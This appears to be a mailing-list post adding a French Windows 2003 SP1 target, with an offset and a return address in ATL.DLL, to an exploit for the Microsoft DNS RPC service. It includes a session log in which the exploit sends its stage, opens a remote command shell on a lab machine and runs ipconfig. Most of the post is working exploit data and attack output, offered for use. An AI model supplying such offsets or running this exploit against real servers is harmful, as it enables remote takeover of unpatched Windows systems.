Exploiting the Microsoft DNS RPC service

[fab at revhosts.net (Fabrice MOURRON)]

Hi,

For a Win2003 SP1 french target :

                                         # ATL.DLL
                                         # 76a31a60 5b               
pop     ebx
                                         # 76a31a61 5d               
pop     ebp
                                         # 76a31a62 c3              ret
                                         [ 'Windows 2003 Server SP1  
French', { 'Off' => 1633, 'Ret' => 0x76a31a60} ],

[*] Trying target Windows 2000 SP0-SP4 / Windows 2003 SP0-SP2 English/ 
French...
[*] Binding to 50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0 at ncacn_ip_tcp: 
192.168.0.200[0] ...
[*] Bound to 50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0 at ncacn_ip_tcp: 
192.168.0.200[0] ...
[*] Sending exploit...
[*] Sending stage (474 bytes)
[*] Error: no response from dcerpc service
[*] Command shell session 3 opened (192.168.0.2:57601 ->  
192.168.0.200:4444)

Microsoft Windows [version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>ipconfig /all
ipconfig /all

Configuration IP de Windows

         Nom de l'h?te . . . . . . . . . . : win2003fr
         Suffixe DNS principal . . . . . . : msf.local
         Type de n?ud . . . . . . . . . .  : Inconnu
         Routage IP activ? . . . . . . . . : Non
         Proxy WINS activ? . . . . . . . . : Non
         Liste de recherche du suffixe DNS.: msf.local

Carte Ethernet Connexion au r?seau local :

         Suffixe DNS propre ? la connexion  :
         Description . . . . . . . . . . .  : VMware Accelerated AMD  
PCNet Adapter
         Adresse physique . . . . . . . . . : 00-0C-29-90-40-C2
         DHCP activ?. . . . . . . . . . . . : Non
         Adresse IP. . . . . . . . .?. . .  : 192.168.0.200
         Masque de sous-r?seau . . .?. . .  : 255.255.255.0
         Passerelle par d?faut . . .?. . .  : 192.168.0.254
         Serveurs DNS . . . . . . . . . .   : 127.0.0.1

French target for Win2003 SP2 coming soon.

@+

Fab